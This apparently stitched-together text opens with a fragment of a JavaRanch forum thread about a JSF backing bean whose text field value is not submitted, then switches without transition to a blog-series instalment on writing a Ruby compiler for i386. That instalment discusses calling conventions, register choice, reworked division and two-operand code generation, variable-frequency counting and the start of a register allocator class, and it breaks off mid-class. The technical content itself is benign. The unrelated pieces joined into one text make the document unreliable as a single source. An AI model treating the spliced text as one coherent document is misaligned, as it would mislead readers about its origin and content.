<h:body> <p:layout <p:layoutUnit <h:form <p:messages <p:tree <p:ajax <p:treeNode> <h:outputText </p:treeNode> </p:tree> </h:form> </p:layoutUnit> <p:layoutUnit <h:form <div class="well well-small" id="questionTextSection"> <h:outputLabel <h:inputTextarea </h:inputTextarea> </div> There's a bunch more code after that, but it's irrelevant. Here's the bean (with irrelevant portions removed): @ManagedBean(name = "bean") @SessionScoped public class BackingBean implements Serializable { private TreeNode root; public TreeNode selectedNode; private String questionText; public BackingBean() { //<removed intializations> } public void onNodeSelect(NodeSelectEvent event) { System.out.println("question text is " + questionText); } public String getQuestionText() { return questionText; } public void setQuestionText(String questionText) { this.questionText = questionText; System.out.println("setting question text to " + questionText); } } Tim Holloway Saloon Keeper Joined: Jun 25, 2001 Posts: 17410 28 I like... posted Apr 29, 2013 06:05:04 0 Welcome to the JavaRanch, Marissa! Once an example gets too big to fit on the screen, the odds that people will spend time trying to make sense of it go way down. So wherever possible, try and strip out as much of the non-essentials as you can. I cannot tell for sure (forest/trees, see above), but it looks like you are expecting a stock html <input type="checkbox"> to do the work of a JSF <h:selectOneRadiobutton> control. That won't work. JSF won't transfer View Control data to/from the backing bean unless the control is a JSF control. An IDE is no substitute for an Intelligent Developer. Marissah Miller Greenhorn Joined: Apr 28, 2013 Posts: 5 posted Apr 29, 2013 18:37:17 0 Thanks for the advice Tim. I removed most of the code I had posted (I wouldn't want to look at that much either, I just know I've seen forums where the first response is something like "you have to post all of your code so we can help you" so I thought I'd just start with that). Okay, so when a node of the tree gets selected OnNodeSelect() DOES get called in the backing bean. However, questionText is always "" even if I have typed something there. So my backing bean is working for the tree (ajax listeners are working) but I don't understand why questionText doesn't get updated. Do I have to submit the form for that to happen? If so, how can I simulate this from the OnNodeSelect() method because that's when I need to get the value. The setQuestionText() method never gets called. Thanks Tim Holloway Saloon Keeper Joined: Jun 25, 2001 Posts: 17410 28 I like... posted Apr 30, 2013 05:00:28 0 AJAX does submit a form. That's not a problem. AJAX can also be fine-tuned to submit only part of a form, but it will always submit its data as a form. However, a Submit operation submits ONLY the form that contains the control that triggers the submit. So any data you enter in any other form will not be submitted. That's a basic HTML constraint, not just a JSF one. Marissah Miller Greenhorn Joined: Apr 28, 2013 Posts: 5 posted May 05, 2013 12:35:57 0 Sorry about the delayed response..I'm a full-time student and I also work full-time and I had a huge project demo on Thursday so I was too busy to check out what you said. When I removed the "treeForm" h:form and just had the whole page on the same form, I was then able to accomplish what I wanted. Thank you so much for your help! I agree. Here's the link: subject: Bean value not getting updated Similar Threads json object send to JSF backing bean to xhtml page Error while Spliting JTreeTable Expansion problems h:commandButton JTree errors with treeModel.nodeChanged() All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/610519/JSF/java/Bean-updated
CC-MAIN-2015-48
refinedweb
1,010
68.4
This is it, people! It has arrived. The most demanded article of this series! This final and Part 4 of my series on “How I Built the Fastest E-commerce Store for a Home Decor Brand” will solely focus on Web Application Performance Optimization. This article will help you with how to boost the performance of your web application along with some tips and optimization hacks to take it to the next level. If you haven't read previous parts, Here are the links: I believe this article to be your ultimate go-to guide after you have completed the hard part of application development and now want to make it a faster and smoother experience for your end users. Various parameters are involved in improving Web App Performance. But before fixing the performance issue, You need to understand the fundamentals of the cause which slows down your app. The following topics are what we will be discussing here. 1. 3 Reasons Why Your App Is Not As Fast As It Should Be 2. How to Actually Improve the Performance of Your Web Application? Before we start, I would like to let you people know that my next article will be on the “Ultimate list of useful Tools and Resources to boost your Web Application Performance”. It will include everything I have personally used in my quest of building faster web appVisit- 3 Reasons why your app is not as fast as it should be 1. Bundle Size Bundle size is a combined size of the production build of your app. It is recommended that the bundle size should be below 644 Kb (Uncompressed). If not 644 Kb you must anyhow try to keep it below 1000 Kb at least. What Causes High Bundle Size? Importing Unnecessary modules is the main cause of high bundle size. You should import only the modules you need. Avoid importing the whole package of a CSS library, If you are going to use only button element from that library. Sometimes, even though you have splitted main.js/app.js file into chunks, index.html will still call both of those files increasing page load time. It happened with me, So I suggest you to take a look at your index.html file before deployment. 2. Unoptimized Images Suppose your app is rendering the same image on a mobile device as well as on a desktop. Desktop due to bigger display needs images with high resolution but that’s not the case with Mobile displays. They require small space to display image, hence it is necessary to lower down image resolution for mobile display. This small tweak can reduce image sizes alone by 30 to 40%. I will be answering how to reduce image size drastically in this article. 3. High Number of Network Requests A web app is loading content through the HTTP request made to the server. More the requests more will be the time taken to completely render your app. You can investigate this for your app through the Network tab in chrome’s developer tools. Basically, Limit the number of resources that are being transferred on the initial load. Lazy loading routes is a great way to reduce the number of network requests made on the initial load. 1. Code Splitting Code Splitting is the most effective way to improve web application performance. When building apps with a bundler, the JavaScript bundle can become quite large, and thus affect the page load time. It would be more efficient if you can split each route’s components into a separate chunk, and only load them when the route is visited. Lazy loading routes is one popular technique to achieve code splitting. There are different ways to achieve code splitting for each major framework but the fundamental concept is the same. When only you access examplewebsite.com/0 then and then only CSS, Js, Media content related to 0.html will be called. Useful Resource- 2. Tree Shaking Do you know what is causing the bundle size of your app to go above 1000 kb? It’s probably the excess of NPM packages you are importing in your main.js! A simple solution to solve this issue is to use ES modules. When you use ES modules, Webpack is able to do tree-shaking. Tree-shaking is when a bundler traverses the whole dependency tree, checks what dependencies are used, and removes unused ones. So, if you use the ES module syntax, Webpack can eliminate the unused code: Importing a Whole module: import * as myModule from '/modules/my-module.js'; Named Import using ES Modules: import {myExport} from '/modules/my-module.js' *To use ES6, You must setup babel compiler in your project. Useful Resource: 3. Optimize Images Images have a bad reputation for eating a significant amount of bandwidth. A 50% resource of an average webpage is images. It is painful to see them loading pixel by pixel which gives the indications of a slow and unoptimized website. How to Optimize Images? 1. Lower down the Image resolution As you can see, the browser needed an image of only 244 x 86 pixels but had to download a full resolution image resulting in unnecessary bandwidth consumption and slow load. You can serve different images for different screen sizes. This is a great article by Google engineers on how to achieve that! 2. Compress Images To be honest, It is hard to find a great compression tool. I have crawled the internet for a long time to do just that. Anyways, I will be publishing an article on the Ultimate list of such optimization tools to help you save time and get optimized images. Squoosh is a great option to compress images. Squoosh is maintained by the Google Web DevRel team, the team that runs developers.google.com/web. If you are on Mac OS X, I would recommend iResize. Currently, I use both of these tools as my primary options to optimize images. After doing all of this, Make sure to get your app a good service worker. Service workers are useful after the first load only! So first, you have to make it faster on initial load through the above techniques we discussed. Workbox is a great tool by google to implement a service worker in your app. It is easy to configure and can be accessed through CLI. List of some Bonus Hacks 1. Using Webpack optimization plugins like UglifyJs, ModuleConcatenate, Splitchunks. 2. Avoid too much preloading by removing some unnecessary rel= “preload” or rel= “prefetch” present in <link> and <script> tags of your html file. 3. Try delivering the images through CDN and notice if you see any positive difference. 4. Visit for any queries, It will do wonders for you! In the end, I want to thank all of you wonderful people for your amazing response to this series. Hopefully, We will meet soon through another article and exchange ideas to help the Web Development community grow. Also if you have anything to ask, I will be always available for you on. Thank You!
https://hackernoon.com/how-i-built-the-fastest-e-commerce-store-for-a-home-decor-brand-part-4-wg8y38wp
CC-MAIN-2020-45
refinedweb
1,186
65.22
provides second reference presentsitude? Then it is better to summarize our initial beliefs with a bivariate probability density $ p $ - $ \int_E p(x)dx $ indicates the probability that we attach to the missile being in region $ E $. The density $ p $ is called our prior for the random variable $ x $. To keep things tractable in our example, we assume that our prior is Gaussian. In particular, we take $$ p = N(\hat x, \Sigma) \tag{1} $$ where $ \hat x $ is the mean of the distribution and $ \Sigma $ is a $ 2 \times 2 $ covariance matrix. In our simulations, we will suppose that $$ \hat x = \left( \begin{array}{c} 0.2 \\ -0.2 \end{array} \right), \qquad \Sigma = \left( \begin{array}{cc} 0.4 & 0.3 \\ 0.3 & 0.45 \end{array} \right) \tag{2} $$ This density $ p(x) $ is shown below as a contour map, with the center of the red ellipse being equal to $ \hat x $. from scipy import linalg import numpy as np import matplotlib.cm as cm import matplotlib.pyplot as plt %matplotlib inline # == Set up the Gaussian prior density p == # Σ = [[0.4, 0.3], [0.3, 0.45]] Σ = np.matrix(Σ) x_hat = np.matrix([0.2, -0.2]).T # == Define the matrices G and R from the equation y = G x + N(0, R) == # G = [[1, 0], [0, 1]] G = np.matrix(G) R = 0.5 * Σ # == The matrices A and Q == # A = [[1.2, 0], [0, -0.2]] A = np.matrix(A) Q = 0.3 * Σ # == The observed value of y == # y = np.matrix([2.3, -1.9]).T # == Set up grid for plotting == # x_grid = np.linspace(-1.5, 2.9, 100) y_grid = np.linspace(-3.1, 1.7, 100) X, Y = np.meshgrid(x_grid, y_grid) def bivariate_normal(x, y, σ_x=1.0, σ_y=1.0, μ_x=0.0, μ_y=0.0, σ_xy=0.0): """ Compute and return the probability density function of bivariate normal distribution of normal random variables x and y Parameters ---------- x : array_like(float) Random variable y : array_like(float) Random variable σ_x : array_like(float) Standard deviation of random variable x σ_y : array_like(float) Standard deviation of random variable y μ_x : scalar(float) Mean value of random variable x μ_y : scalar(float) Mean value of random variable y σ_xy : array_like(float) Covariance of random variables x and y """ x_μ = x - μ_x y_μ = y - μ_y ρ = σ_xy / (σ_x * σ_y) z = x_μ**2 / σ_x**2 + y_μ**2 / σ_y**2 - 2 * ρ * x_μ * y_μ / (σ_x * σ_y) denom = 2 * np.pi * σ_x * σ_y * np.sqrt(1 - ρ**2) return np.exp(-z / (2 * (1 - ρ**2))) / denom def gen_gaussian_plot_vals(μ, C): "Z values for plotting the bivariate Gaussian N(μ, C)" m_x, m_y = float(μ[0]), float(μ[1]) s_x, s_y = np.sqrt(C[0, 0]), np.sqrt(C[1, 1]) s_xy = C[0, 1] return bivariate_normal(X, Y, s_x, s_y, m_x, m_y, s_xy) # Plot the figure) plt.show()) ax.text(float(y[0]), float(y[1]), "$y$", fontsize=20, color="black") plt.show() The bad news is that our sensors are imprecise. In particular, we should interpret the output of our sensor not as $ y=x $, but rather as $$ y = G x + v, \quad \text{where} \quad v \sim N(0, R) \tag{3} $$ to update our prior $ p(x) $ to $ p(x \,|\, y) $ via$$ p(x \,|\, y) = \frac{p(y \,|\, x) \, p(x)} {p(y)} $$$$ p(x \,|\, y) = N(\hat x^F, \Sigma^F) $$ where $$ \hat x^F := \hat x + \Sigma G' (G \Sigma G' + R)^{-1}(y - G \hat x) \quad \text{and} \quad \Sigma^F := \Sigma - \Sigma G' (G \Sigma G' + R)^{-1} G \Sigma \tag{4} $$ fig, ax = plt.subplots(figsize=(10, 8)) ax.grid() Z = gen_gaussian_plot_vals(x_hat, Σ) cs1 = ax.contour(X, Y, Z, 6, colors="black") ax.clabel(cs1, inline=1, fontsize=10) M = Σ * G.T * linalg.inv(G * Σ * G.T + R) x_hat_F = x_hat + M * (y - G * x_hat) Σ_F = Σ - M * G * Σ new_Z = gen_gaussian_plot_vals(x_hat_F, Σ_F) cs2 = ax.contour(X, Y, new_Z, 6, colors="black") ax.clabel(cs2, inline=1, fontsize=10) ax.contourf(X, Y, new_Z, 6, alpha=0.6, cmap=cm.jet) ax.text(float(y[0]), float(y[1]), "$y$", fontsize=20, color="black") plt.show(), $$ x_{t+1} = A x_t + w_{t+1}, \quad \text{where} \quad w_t \sim N(0, Q) \tag{5} $$ Our aim is to combine this law of motion and our current distribution $ p(x \,|\, y) = N(\hat x^F, \Sigma^F) $ to come up with a new predictive distribution for the location in one unit of time.$$ \mathbb{E} [A x^F + w] = A \mathbb{E} x^F + \mathbb{E} w = A \hat x^F = A \hat x + A \Sigma G' (G \Sigma G' + R)^{-1}(y - G \hat x) $$ and$$ \operatorname{Var} [A x^F + w] = A \operatorname{Var}[x^F] A' + Q = A \Sigma^F A' + Q = A \Sigma A' - A \Sigma G' (G \Sigma G' + R)^{-1} G \Sigma A' + Q $$ $$ \begin{aligned} \hat x_{new} &:= A \hat x + K_{\Sigma} (y - G \hat x) \\ \Sigma_{new} &:= A \Sigma A' - K_{\Sigma} G \Sigma A' + Q \nonumber \end{aligned} \tag{6} $$ - The density $ p_{new}(x) = N(\hat x_{new}, \Sigma_{new}) $ is called the predictive distribution The predictive distribution is the new density shown in the following figure, where the update has used parameters.$$ A = \left( \begin{array}{cc} 1.2 & 0.0 \\ 0.0 & -0.2 \end{array} \right), \qquad Q = 0.3 * \Sigma $$ fig, ax = plt.subplots(figsize=(10, 8)) ax.grid() # Density 1 Z = gen_gaussian_plot_vals(x_hat, Σ) cs1 = ax.contour(X, Y, Z, 6, colors="black") ax.clabel(cs1, inline=1, fontsize=10) # Density 2 M = Σ * G.T * linalg.inv(G * Σ * G.T + R) x_hat_F = x_hat + M * (y - G * x_hat) Σ_F = Σ - M * G * Σ Z_F = gen_gaussian_plot_vals(x_hat_F, Σ_F) cs2 = ax.contour(X, Y, Z_F, 6, colors="black") ax.clabel(cs2, inline=1, fontsize=10) # Density 3 new_x_hat = A * x_hat_F new_Σ = A * Σ_F * A.T + Q new_Z = gen_gaussian_plot_vals(new_x_hat, new_Σ) cs3 = ax.contour(X, Y, new_Z, 6, colors="black") ax.clabel(cs3, inline=1, fontsize=10) ax.contourf(X, Y, new_Z, 6, alpha=0.6, cmap=cm.jet) ax.text(float(y[0]), float(y[1]), "$y$", fontsize=20, color="black") plt.show() $$ \begin{aligned} \hat x_{t+1} &= A \hat x_t + K_{\Sigma_t} (y_t - G \hat x_t) \\ \Sigma_{t+1} &= A \Sigma_t A' - K_{\Sigma_t} G \Sigma_t A' + Q \nonumber \end{aligned} \tag{7} $$ These are the standard dynamic equations for the Kalman filter (see, for example, [LS18],): $$ \Sigma_{t+1} = A \Sigma_t A' - A \Sigma_t G' (G \Sigma_t G' + R)^{-1} G \Sigma_t A' + Q \tag{8} $$ This is a nonlinear difference equation in $ \Sigma_t $. A fixed point of (8) is a constant matrix $ \Sigma $ such that $$ \Sigma = A \Sigma A' - A \Sigma G' (G \Sigma G' + R)^{-1} G \Sigma A' + Q \tag{9} $$. A-negative and symmetric, the sequence $ \{\Sigma_t\} $ in (8) converges to a non-negative symmetric matrix $ \Sigma $ that solves (9). Implementation¶ The class Kalman from the QuantEcon.py package implements the Kalman filter Instance data consists of: - the moments $ (\hat x_t, \Sigma_t) $ of the current prior. - An instance of the LinearStateSpace class from QuantEcon.py. The latter represents a linear state space model of the form$$ \begin{aligned} x_{t+1} & = A x_t + C w_{t+1} \\ y_t & = G x_t + H v_t \end{aligned} $$ where the shocks $ w_t $ and $ v_t $ are IID standard normals. To connect this with the notation of this lecture we set$$ Q := CC' \quad \text{and} \quad R := HH' $$ - The class Kalmanfrom the QuantEcon.py package has a number of methods, some that we will wait to use until we study more advanced applications in subsequent lectures. Methods pertinent for this lecture. Exercise 1¶ Consider the following simple application of the Kalman filter, loosely based on [LS18],.py, plot the first five predictive densities $ p_t(x) = N(\hat x_t, \Sigma_t) $. As shown in [LS18],$$ z_t := 1 - \int_{\theta - \epsilon}^{\theta + \epsilon} p_t(x) dx $$$$ A = \left( \begin{array}{cc} 0.5 & 0.4 \\ 0.6 & 0.3 \end{array} \right) $$ To initialize the prior density, set$$ \Sigma_0 = \left( \begin{array}{cc} 0.9 & 0.3 \\ 0.3 & 0.9 \end{array} . from quantecon import Kalman from quantecon import LinearStateSpace from scipy.stats import norm # == parameters == # θ = 10 # Constant value of state x_t A, C, G, H = 1, 0, 1, 1 ss = LinearStateSpace(A, C, G, H, mu_0=θ) # == set prior, initialize kalman filter == # x_hat_0, Σ_0 = 8, 1 kalman = Kalman(ss, x_hat_0, Σ_0) # == draw observations of y from state space model == # N = 5 x, y = ss.simulate(N) y = y.flatten() # == set up plot == # fig, ax = plt.subplots(figsize=(10,8)) xgrid = np.linspace(θ - 5, θ + 2, 200) for i in range(N): # == record the current predicted mean and variance == # m, v = [float(z) for z in (kalman.x_hat, kalman.Sigma)] # == plot, update filter == # ax.plot(xgrid, norm.pdf(xgrid, loc=m, scale=np.sqrt(v)), label=f'$t={i}$') kalman.update(y[i]) ax.set_title(f'First {N} densities when $\\theta = {θ:.1f}$') ax.legend(loc='upper left') plt.show() from scipy.integrate import quad ϵ = 0.1 θ = 10 # Constant value of state x_t A, C, G, H = 1, 0, 1, 1 ss = LinearStateSpace(A, C, G, H, mu_0=θ) x_hat_0, Σ_0 = 8, 1 kalman = Kalman(ss, x_hat_0, Σ_0) T = 600 z = np.empty(T) x, y = ss.simulate(T) y = y.flatten() for t in range(T): # Record the current predicted mean and variance and plot their densities m, v = [float(temp) for temp in (kalman.x_hat, kalman.Sigma)] f = lambda x: norm.pdf(x, loc=m, scale=np.sqrt(v)) integral, error = quad(f, θ - ϵ, θ + ϵ) z[t] = 1 - integral kalman.update(y[t]) fig, ax = plt.subplots(figsize=(9, 7)) ax.set_ylim(0, 1) ax.set_xlim(0, T) ax.plot(range(T), z) ax.fill_between(range(T), np.zeros(T), z, color="blue", alpha=0.2) plt.show() from numpy.random import multivariate_normal from scipy.linalg import eigvals # === Define A, C, G, H === # G = np.identity(2) H = np.sqrt(0.5) * np.identity(2) A = [[0.5, 0.4], [0.6, 0.3]] C = np.sqrt(0.3) * np.identity(2) # === Set up state space mode, initial value x_0 set to zero === # ss = LinearStateSpace(A, C, G, H, mu_0 = np.zeros(2)) # === Define the prior density === # Σ = [[0.9, 0.3], [0.3, 0.9]] Σ = np.array(Σ) x_hat = np.array([8, 8]) # === Initialize the Kalman filter === # kn = Kalman(ss, x_hat, Σ) # == Print eigenvalues of A == # print("Eigenvalues of A:") print(eigvals(A)) # == Print stationary Σ == # S, K = kn.stationary_values() print("Stationary prediction error variance:") print(S) # === Generate the plot === # T = 50 x, y = ss.simulate(T) e1 = np.empty(T-1) e2 = np.empty(T-1) for t in range(1, T): kn.update(y[:,t]) e1[t-1] = np.sum((x[:, t] - kn.x_hat.flatten())**2) e2[t-1] = np.sum((x[:, t] - A @ x[:, t-1])**2) fig, ax = plt.subplots(figsize=(9,6)) ax.plot(range(1, T), e1, 'k-', lw=2, alpha=0.6, label='Kalman filter error') ax.plot(range(1, T), e2, 'g-', lw=2, alpha=0.6, label='Conditional expectation error') ax.legend() plt.show() Eigenvalues of A: [ 0.9+0.j -0.1+0.j] Stationary prediction error variance: [[0.40329108 0.1050718 ] [0.1050718 0.41061709]] Footnotes [1] See, for example, page 93 of [Bis06]. To get from his expressions to the ones used above, you will also need to apply the Woodbury matrix identity.
https://lectures.quantecon.org/py/kalman.html
CC-MAIN-2019-35
refinedweb
1,934
68.47
This is part of a series I started in March 2008 - you may want to go back and look at older parts if you're new to this series. of the recent parts that the code is getting more and more prone to problems due to attempts at reusing registers. Register allocation is the proper solution to this. That is, to introduce a mechanism for determining what code gets to use which registers when, and that handles the situation where too few registers are available properly (by "spilling" registers onto the stack) Let me first make it clear that the really naive alternative to this is to avoid register allocation entirely, and to declare a few registers to be "scratch" registers that can only be safely used within code where no code generation is delegated further down. This is possible to do by pushing all intermediate results onto the stack, and popping them off only briefly to carry out necessary operations and push them back onto the stack again (optionally with simple optimizations to operate directly on the top of the stack for single operand operations or when possible with the last of multiple operand instructions). Basically, this means you're "emulating" a stack machine with registers. This is an approach taken by many simple compilers for unoptimized code, deferring the problem of register allocation to optimization passes. In reality we're very close to that, and in some respects I wish I'd kept purely to that approach, not least because it took me two months to get time to wrap up this part properly. But on the other hand, doing very basic register allocation is not that hard, and since we've started down that path we might as well go a bit further. Only a bit mind you. We will in fact in this part refactor some code to need register allocation less, to the point where we can get away with only minor adjustments to the original really primitive allocator. Optimal register allocation is hard, and tends to require analysis that will require or at least strongly favor a solution with a low level intermediate representation that allows more in-depth analysis of register usage. A first step is generally to analyse "liveness" of each variable, including temporary variables introduced by the compiler. Then the problem basically boils down to finding a way to map as many variable references as possible to registers so that you don't exceed the available number of registers for your architecture at any one point. The "at any one point" part adds complexity, since reuse of registers is central to minimizing the number of memory accesses, which is the main goal of register allocation: For most systems, memory accesses are substantially slower than register access (though this is less of an issue in these days of multi-level processor caches than in the old days where every memory access when to external memory; when you fail to hit cache, though, you are far more brutally penalized on modern CPUs as the gap between CPU performance and memory latency has widened) If you have n registers, and no more than n variables are "live" at once, then you have it easy if you are able to determine wich variables are "live". The fun begins when (and on an architecture like i386, this is likely to be pretty much all the time) the code block you are allocating registers for is referencing more stuff than you have registers for. This either means "spilling" the contents of a register to memory in the middle of a function in order to load another variable, or keeping some variables you'd like to have in a register in memory instead, other than when operating on it. That's where the challenge arises. (though Ruby reduces this problem through other inefficiences: Almost everything is accessed via methods, which reduces the number of variables that are easy to put into registers; we may hope to improve on that later, but for now it reduces the immediate benefit of register allocation) Another typical approach is graph coloring, which I'm not going to go into at all, as it's slow and complicated. A more recent approach is Linear Scan allocators, covered on the Wikipedia page for register allocation, which is popular for JIT's etc because it is in general a lot faster (and simpler) at the cost of some performance in the generated code. In any case, down the rabbit hole you go... I have no desire to deal with that anytime soon, and especially not on an architecture like i386 where the number of registers is so small. On, say, x86-64, or M68k it'd be a different matter, as you have vastly better chances of being able to keep a substantial proportion of intermediate results in registers and largely avoid spilling the results to the stack, and so you're a real sucker if you don't take maximal advantage of the registers (however, as mentioned above, without other work, we'd have problems taking full advantage). (translation: I'll have to deal with this some day, but not now) What we will do for now is to mostly rely on keeping stuff in memory (including on the stack), except for short term loading stuff into %eax when operating on it. As needed we'll also use %edx (see below). Beyond that, we will just guess wildly at some heuristics... Apart from the guessing wildly at some heuristics part, this is roughly what we've done so far anyway... But so far we've done the register allocation extremely ad-hoc, so it is worth first establishing our actual conventions. We start with the C calling convention, since we're trying to allow our code to call C code directly: We roughly follow the cdecl calling convention for i386. That is, we will aim for %eax, %ecx and %edx to be caller saved. That is, if we rely on them to maintain their values, we will push them onto the stack before calling another method. In practice we will treat %eax as a scratch register that is only used for short windows, and so we will rarely if ever want to bother to save it, especially as it is also generally used as the return value anyway. Everything else is to be callee saved (but see caveat below); that is, if they are used in the called method, they will be saved there, and needs to be back to their original value by the time the method returns. And we store arguments on the stack. Next we add on some extensions: Specifically we store the number of arguments in %ebx as methods needs to be able to determine the precise number of arguments whether due to "splats" or to throw appropriate exceptions to enforce arity (ensure that the number of arguments matches the declared number of arguments for the method; we don't do this yet). Note that this breaks the "cdecl" calling convention. However this is only a problem if C code (or other code conforming to the cdecl calling convention) calls into our code. For now we're not sticking our head into that worms nest (though you need to be aware of this if you want to experiment with the code and use C-functions like qsort which uses callbacks), so it's a non-issue (if/when we do, we'll either need to consider preserving %ebx, or more likely we'll need to bridge calls, as the method will likely require %ebx to hold the number of arguments for more than just the splats to work (e.g. Ruby methods are expected to throw ArgumentError if called with the wrong number of arguments, which will eventually force us to add additional checks at the start of each method). As a result, %ebx is in practice free other than on entering a function, as we save it to the local stack frame. I'm of two minds whether to keep passing the number of arguments this way, as the code has gotten to the point where we end up temporarily pushing it on the stack anyway on call, and pushing it on the stack again afterwards. The only real current benefit of using a register for it is that we can directly call C functions that are totally unaware of how we pass the number of arguments. These C functions don't know about the "fake" numargs "variable" anyway, and so we could as an alternative introduce a way of indicating we want C calling convention that would just leave out numargs entirely. It'd be slightly more hassle to use, but it'd only ever be used for low level %s() code anyway. We're not going to change this right now, regardless. Well, on i386 we have %ecx, %edx, %esi, %edi. The "problem" is that all of them have special purposes in some cases. We've run into one of them: %edx is used to hold the high 32 bits of the dividend for idivl, and the remainder of the result, and needs special treatment as a result. There's also a number of floating point registers. We also have %ebp which we use for the frame pointer to access local variables and method arguments via, and %esp, the stack pointer. As discussed above, we could in theory use %ebx, with the caveat that while the splat handling is as is is, it'll get clobbered often, so for now I've kept it out. (There are many other register names on i386, but many of them alias 16- and 8-bit portions of the 32-bit registers referred to above; as someone who grew up with M68k asm, where this kind of thing did not occur, in general I'll pretend I never heard about that wart) As I said, we'll guess wildly. As a first approximation, we'll make %esi hold self from the first reference to self in each method. We'll cover the implementation of that in the next part, so for now we will ignore %esi. This is because method calls and instance variable access both require self, and so we can assume it will be quite frequent, and as I will show next time, this pans out quite nicely. I toyed with the idea of making %edi hold self.class, based on the same assumption, but this has two problems: It reduces the set of registers available to us further, and it complicates handling of eigenclasses: The "internal" inheritance chain for Ruby objects can actually change at nearly any time, if someone decides to extend the object with methods tied to the objects meta class / eigenclass. If we cache self.class that limits us in how to handle that further down the line. So for now I won't do anything about that. This leaves us with %ecx, %edx and %edi free for allocation so far. We further allow "forced" allcation of specific registers in order to handle cases like idivl metioned earlier. At the same time we'll make some small changes that has the effect of minimizing the amount of time temporary values are kept in registers that has the effect of ensuring we never need many of them. Then we'll add a "quick and dirty scan" step that will simply create a set of candidate variables as follows: Note that at this point we could go the next step and store information about liveness ranges, and use that to allow register usage to overlap, but one step at a time. The main thing is to get the overall mechanism in place. As little as possible. On accesing any local variables or arguments, we check if they're in a register first, if not we try to load it into a free register if there is one, and if not we fall back on the current behaviour of using %eax (and reloading / saving the variable on each access). This totally sidesteps the need for liveness analysis, but also means we don't get the full benefit, and it's easy to create pathological cases where it performs really badly (e.g. lots of variables accessed few times, used one after the other, and then once you've referenced enough variables, reference them all again, right after they've been evicted from the registers; repeat - in this way you can construct cases where you get no benefit from the register allocation at all, while if you'd kept a subset of the variables in the registers throughout the code block, you would). But this is still no worse than the code we currently generate. A number of methods surrently refer to registers through symbols or even strings that directly reference them. A first step is to try to abstract away more of this so that we as much as possible request registers from the Emitter so that the registers can be replaced later if possible/necessary. As a bonus, this will set us on the right path to make the compiler easier to retarget to other architectures. This first changeset adds methods for the stack pointer, for using %ebx as scratch register, and a couple of other helpers, as well as start cleaning up the Compiler class to not explicitly mention registers by name so many places. You can see it in 92aa83f - I won't cover that commit in more detail. We already have with_register that sort-of tried to do a little bit of very basic register allocation. But with_register comes with substantial caveats: It knows nothing about what to do if it runs out of registers to allocate. So lets try to provoke it to fail, so we have something to fix to start with: %s(printf "%d = 2\n" (div (div (div 16 2) 2) 2)) I picked div as our recent rewrite away from runtime.c left us with code in compile_div that does dual nested with_register calls already, so it's well suited to ensure we run out of registers in our current regime. You should get something like this if you try to compile it: ./emitter.rb:364:in `with_register': Register allocation FAILED (RuntimeError) The problem is simply that we've only set aside %edx and %ecx, and furthermore we're not doing anything to allow spilling the values to the stack, or even to make them available again when caling into another function. Triggering this in actual Ruby code is harder, as almost everything quickly devolves into method calls that effectively "reset" the register allocations by virtue of the calling conventions requirements for who saves which registers. But lets sort this out first of all anyway. First, since this revealed the danger of the nested with_register calls, which will remain inefficient at best, lets address the simpler case of compile_2 which we've used for dual-operand arithmetic and comparisons: (You'll find these changes and the div test case in 0fdfb34) def compile_2(scope, left, right) src = compile_eval_arg(scope,left) @e.with_register do |reg| @e.movl(src,reg) @e.save_result(compile_eval_arg(scope,right)) yield reg end [:subexpr] end Just a tiny change here: We've lifted the compile_eval_arg(scope,left) call out. Frankly we should probably remove the need fully, and just use the stack. I'll consider that later. In the meantime this reduces register usage substantially in cases where the left-hand expression tree is deep. The bigger change is compile_div: def compile_div(scope, left, right) @e.pushl(compile_eval_arg(scope,left)) res = compile_eval_arg(scope,right) @e.with_register(:edx) do |dividend| @e.with_register do |divisor| @e.movl(res,divisor) # We need the dividend in %eax *and* sign extended into %edx, so # it doesn't matter which one of them we pop it into: @e.popl(@e.result) @e.movl(@e.result, dividend) @e.sarl(31, dividend) @e.idivl(divisor) end end [:subexpr] end This is pretty much a rewrite - the old version was horribly messy and brittle, because it tried to work around not being able to tell with_register exactly what it wanted. So to simplify, lets make with_register handle that. And at the same time we lift the argument evaluation out of the actual division, which massively simplifies things: First we evaluate the left, and push the result onto the stack. Then we evaluate the right, and leave the result. Then we forcibly allocate %edx since we know idivl needs it for both arguments and return value. Then we allocate a register for the divisor (right hand). We then get the dividend (left hand) off the stack, into %eax, move it into the allocated register, which will be %edx. We then shift right to only leave the sign bit (see last time we dicussed the divisions for more on this). Finally we do the division. You may note that this is going to be wasteful in cases where the left hand expression is a static value etc. that we could just load directly into the right register. Adding some code to detect that will save some stack manipulation. But that's not a priority now. The corresponding change to emitter.rb to expand with_register looks like this for now: - def with_register + def with_register(required_reg = nil) # FIXME: This is a hack - for now we just hand out :edx or :ecx # and we don't handle spills. @allocated_registers ||= Set.new - free = @free_registers.shift + + if required_reg + free = @free_registers.delete(required_reg) + else + free = @free_registers.shift + end + In other words, this will still blow up spectacularly if we need more registers. Note that that the changes we've done means the register allocation now only surrounds a handful of instructions doing calculation, and no further calls. Luckily this means that in reality we shouldn't need more. We'd like more, but most of our register usage will only be for caching variables we've allocated space in memory for. As such, we know the worst case for the register allocation is that we need to juggle %edx around, as that's the only register we specifically need (so far) for idivl. As "stage 1" this gets our previous example to compile and run. For now we'll move on to the meatier part of register allocation: Moving variables into registers. You're not going to like this part. It is hairy and ugly, and involves changing #rewrite_let_env and find_vars in transform.rb, which are not exactly the prettiest part of the compiler to begin with. The relevant part of rewrite_let_env is the simplest: # We use this to assign registers freq = Hash.new(0) vars,env= find_vars(e[3],scopes,Set.new, freq) We set aside a Hash with 0 as the default value, to keep count of the variable references we see. Then we assign the frequency data to a new extra field of the AST nodes: e[3].extra[:varfreq] = freq.sort_by {|k,v| -v }.collect{|a| a.first } extra is simply adding this to AST::Expr (in afdcd99): + + def extra + @extra ||= {} + end Back to transform.rb, the changes to find_vars are more extensive, but most of them are about threading freq through the recursive calls, and some refactoring (especially breaking out #is_special_name. The meat of it is this little change: elsif n.is_a?(Symbol) sc = in_scopes(scopes,n) freq[n] += 1 if !is_special_name?(n) Specifically, when we get to a "leaf", if it is not a "special" name as defined in the new utility method, we count it as a variable reference to take into account for the later allocation. You can find the full changes to transform.rb here: 3f2ab88 I've split out the "backend" of the new register allocation code in regalloc.rb in 608adc1. It could probably do with some refactoring already, but that will have to wait. Most of the explanations here can be found in the source as well. The RegisterAllocator class contains the Cache class which is used to hold information about the current state of a register that is currently used to hold a variable. class Cache # The register this cache entry is for attr_accessor :reg # The block to call to spill this register if the register is dirty (nil if the register is not dirty) attr_accessor :spill # 